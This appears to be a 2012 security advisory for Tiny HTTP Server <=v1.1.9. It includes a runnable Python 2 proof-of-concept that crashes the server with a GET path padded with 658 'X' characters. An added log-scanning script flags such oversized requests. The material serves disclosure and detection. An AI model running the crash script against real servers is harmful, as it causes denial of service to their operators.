Tiny HTTP Server Remote Crash PoC Exploit

Summary

Tiny HTTP Server <=v1.1.9 suffers from a remote crash vulnerability; a PoC is included below.

Credit:

The information has been provided by localh0t.


Details

Vulnerable Systems:
 * Tiny HTTP Server <=v1.1.9

Exploit:

# Python 2 script (uses httplib and print statements)
import httplib,sys

if (len(sys.argv) < 3):
    print '\nTiny HTTP Server <=v1.1.9 Remote Crash PoC'
    print '\n Usage: %s <host> <port> \n' %(sys.argv[0])
    sys.exit()

# Request path padding: 658 'X' characters appended after "/"
payload = 'X' * 658

try:
    print '\n[!] Connecting to %s ...' %(sys.argv[1])
    httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
    httpServ.connect()
    print '[!] Sending payload...'
    httpServ.request('GET', '/' + str(payload))
    print '[!] Exploit succeed. Check %s if crashed.\n' %(sys.argv[1])
except:
    print '[-] Connection error, exiting...'

httpServ.close()
sys.exit()
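Detection counterpart to the PoC above, as an added example that is not part of the original advisory: it scans access-log lines for request targets long enough to match the oversized GET the PoC sends. It assumes requests are logged in Common Log Format by a proxy or sensor in front of the server; `MAX_TARGET_LEN`, the function names and the sample lines are constructed for illustration.

```python
import re

# Assumption: the page gives only the PoC's length (658 bytes after "/"), not
# the exact size at which the server fails, so alert well below that length.
MAX_TARGET_LEN = 512

# Common Log Format: src ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\S+)')

def longest_run(text):
    """Length of the longest run of one repeated character (padding hint)."""
    best = run = 0
    prev = None
    for ch in text:
        run = run + 1 if ch == prev else 1
        prev = ch
        best = max(best, run)
    return best

def find_oversized_requests(lines, max_len=MAX_TARGET_LEN):
    """Return one finding per request whose target is max_len chars or longer."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = CLF.match(line)
        if not m:
            continue  # not a parsable request line; nothing to measure
        src, method, target, status = m.groups()
        if len(target) >= max_len:
            findings.append({"line": lineno, "src": src, "method": method,
                             "target_len": len(target),
                             "longest_run": longest_run(target),
                             "status": status})
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Feb/2012:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '192.0.2.77 - - [25/Feb/2012:10:00:05 +0000] "GET /' + "X" * 658 + ' HTTP/1.1" 502 0',
    '192.0.2.11 - - [25/Feb/2012:10:00:09 +0000] "GET /docs/' + "a" * 90 + ' HTTP/1.1" 404 0',
    'truncated or malformed line',
]

if __name__ == "__main__":
    for finding in find_oversized_requests(SAMPLE_LOG):
        print(finding)
```

A high `longest_run` relative to `target_len` points to padding rather than a legitimately long URL, which helps triage alerts from applications that use long query strings.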

Disclosure Timeline:
Published: 2012-02-25
